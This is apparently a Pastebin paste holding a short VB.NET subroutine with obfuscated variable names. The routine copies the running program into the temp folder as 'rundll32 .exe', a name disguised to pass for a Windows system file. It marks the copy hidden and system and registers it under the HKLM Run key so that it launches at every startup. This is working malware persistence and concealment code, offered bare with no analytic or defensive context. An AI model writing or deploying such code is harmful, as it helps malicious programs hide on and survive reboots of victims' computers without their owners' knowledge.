Guest User

Untitled

a guest
May 21st, 2018
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 0.62 KB | None | 0 0
  1.     Sub feature()
  2.         If iohouh7877 = "hhhhhhhhhheeeee" Then
  3.  
  4.             Dim temp As Object = Path.GetTempPath
  5.  
  6.             Dim ASDASD4 = Application.ExecutablePath
  7.             Dim AS3 As Object = Path.GetFullPath(ASDASD4)
  8.             Dim ASFR3R As FileAttributes = FileAttributes.System + FileAttributes.Hidden
  9.             My.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("rundll32", temp & "rundll32 .exe")
  10.  
  11.             FileCopy(AS3, temp & "\" & "rundll32 .exe")
  12.             File.SetAttributes(temp & "\" & "rundll32 .exe", ASFR3R)
  13.         End If
  14.     End Sub
Add Comment
Please, Sign In to add comment